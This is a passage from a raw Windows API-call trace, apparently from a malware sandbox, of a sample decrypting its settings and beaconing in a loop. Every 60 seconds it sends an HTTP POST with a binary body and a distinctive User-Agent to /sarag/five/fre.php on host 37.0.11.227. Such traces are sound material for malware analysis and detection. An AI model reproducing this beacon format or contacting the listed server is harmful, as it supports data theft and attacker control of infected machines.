lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0335.826] closesocket (s=0xbec) returned 0 [0335.827] GetProcessHeap () returned 0x690000 [0335.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0335.827] GetProcessHeap () returned 0x690000 [0335.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.827] GetProcessHeap () returned 0x690000 [0335.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0335.827] GetProcessHeap () returned 0x690000 [0335.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0335.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1940) returned 0xbec [0335.830] Sleep (dwMilliseconds=0xea60) [0335.831] GetProcessHeap () returned 0x690000 [0335.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0335.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.843] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0335.850] GetProcessHeap () returned 0x690000 [0335.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0335.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.852] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.854] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.855] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.855] GetProcessHeap () returned 0x690000 [0335.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0335.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.856] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0335.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.857] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.858] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0335.858] GetProcessHeap () returned 0x690000 [0335.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0335.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.865] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0335.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.865] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0335.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.866] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0335.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.867] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0335.867] GetProcessHeap () returned 0x690000 [0335.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0335.867] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0335.867] GetProcessHeap () returned 0x690000 [0335.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0335.868] GetProcessHeap () returned 0x690000 [0335.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0335.869] GetProcessHeap () returned 0x690000 [0335.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0335.869] GetProcessHeap () returned 0x690000 [0335.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0335.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.875] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0335.880] GetProcessHeap () returned 0x690000 [0335.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0335.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.881] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.882] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.883] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.883] GetProcessHeap () returned 0x690000 [0335.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0335.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.884] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0335.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.885] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.886] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0335.886] GetProcessHeap () returned 0x690000 [0335.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0335.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.888] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0335.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.889] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0335.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.889] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0335.889] GetProcessHeap () returned 0x690000 [0335.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0335.890] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0335.890] GetProcessHeap () returned 0x690000 [0335.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0335.890] socket (af=2, type=1, protocol=6) returned 0xbf0 [0335.890] connect (s=0xbf0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0335.916] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0335.916] GetProcessHeap () returned 0x690000 [0335.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0335.916] GetProcessHeap () returned 0x690000 [0335.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0335.917] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.917] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0335.917] GetProcessHeap () returned 0x690000 [0335.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0335.917] GetProcessHeap () returned 0x690000 [0335.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.918] GetProcessHeap () returned 0x690000 [0335.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0335.918] GetProcessHeap () returned 0x690000 [0335.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0335.919] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.920] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0335.920] GetProcessHeap () returned 0x690000 [0335.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0335.920] GetProcessHeap () returned 0x690000 [0335.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.920] send (s=0xbf0, buf=0x6ad508*, len=242, flags=0) returned 242 [0335.921] send (s=0xbf0, buf=0x6aba40*, len=159, flags=0) returned 159 [0335.921] GetProcessHeap () returned 0x690000 [0335.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0335.921] recv (in: s=0xbf0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0336.005] GetProcessHeap () returned 0x690000 [0336.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0336.005] GetProcessHeap () returned 0x690000 [0336.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0336.006] GetProcessHeap () returned 0x690000 [0336.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0336.006] GetProcessHeap () returned 0x690000 [0336.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0336.006] closesocket (s=0xbf0) returned 0 [0336.007] GetProcessHeap () returned 0x690000 [0336.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0336.007] GetProcessHeap () returned 0x690000 [0336.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.019] GetProcessHeap () returned 0x690000 [0336.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0336.020] GetProcessHeap () returned 0x690000 [0336.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1944) returned 0xbf0 [0336.022] Sleep (dwMilliseconds=0xea60) [0336.024] GetProcessHeap () returned 0x690000 [0336.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0336.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.036] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0336.045] GetProcessHeap () returned 0x690000 [0336.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0336.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.046] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.048] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.049] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.049] GetProcessHeap () returned 0x690000 [0336.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0336.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.051] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0336.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.055] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.056] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0336.056] GetProcessHeap () returned 0x690000 [0336.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0336.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.058] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0336.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.059] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0336.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.066] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0336.066] GetProcessHeap () returned 0x690000 [0336.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0336.066] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0336.066] GetProcessHeap () returned 0x690000 [0336.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.067] GetProcessHeap () returned 0x690000 [0336.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.067] GetProcessHeap () returned 0x690000 [0336.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0336.067] GetProcessHeap () returned 0x690000 [0336.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0336.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0336.084] GetProcessHeap () returned 0x690000 [0336.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0336.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.088] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.089] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.091] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.091] GetProcessHeap () returned 0x690000 [0336.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0336.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.096] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0336.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.097] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.099] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0336.099] GetProcessHeap () returned 0x690000 [0336.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.100] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0336.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.102] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0336.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.103] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0336.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.105] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0336.105] GetProcessHeap () returned 0x690000 [0336.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0336.105] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0336.105] GetProcessHeap () returned 0x690000 [0336.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0336.105] socket (af=2, type=1, protocol=6) returned 0xbf4 [0336.106] connect (s=0xbf4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0336.184] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0336.184] GetProcessHeap () returned 0x690000 [0336.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0336.192] GetProcessHeap () returned 0x690000 [0336.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0336.193] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.194] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0336.194] GetProcessHeap () returned 0x690000 [0336.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0336.194] GetProcessHeap () returned 0x690000 [0336.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.195] GetProcessHeap () returned 0x690000 [0336.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0336.195] GetProcessHeap () returned 0x690000 [0336.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0336.195] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.196] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0336.196] GetProcessHeap () returned 0x690000 [0336.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0336.196] GetProcessHeap () returned 0x690000 [0336.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.197] send (s=0xbf4, buf=0x6ad508*, len=242, flags=0) returned 242 [0336.197] send (s=0xbf4, buf=0x6aba40*, len=159, flags=0) returned 159 [0336.197] GetProcessHeap () returned 0x690000 [0336.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0336.197] recv (in: s=0xbf4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0336.277] GetProcessHeap () returned 0x690000 [0336.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0336.278] GetProcessHeap () returned 0x690000 [0336.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0336.278] GetProcessHeap () returned 0x690000 [0336.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0336.279] GetProcessHeap () returned 0x690000 [0336.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0336.279] closesocket (s=0xbf4) returned 0 [0336.279] GetProcessHeap () returned 0x690000 [0336.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0336.279] GetProcessHeap () returned 0x690000 [0336.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.280] GetProcessHeap () returned 0x690000 [0336.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0336.280] GetProcessHeap () returned 0x690000 [0336.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0336.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1948) returned 0xbf4 [0336.282] Sleep (dwMilliseconds=0xea60) [0336.283] GetProcessHeap () returned 0x690000 [0336.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0336.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.284] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 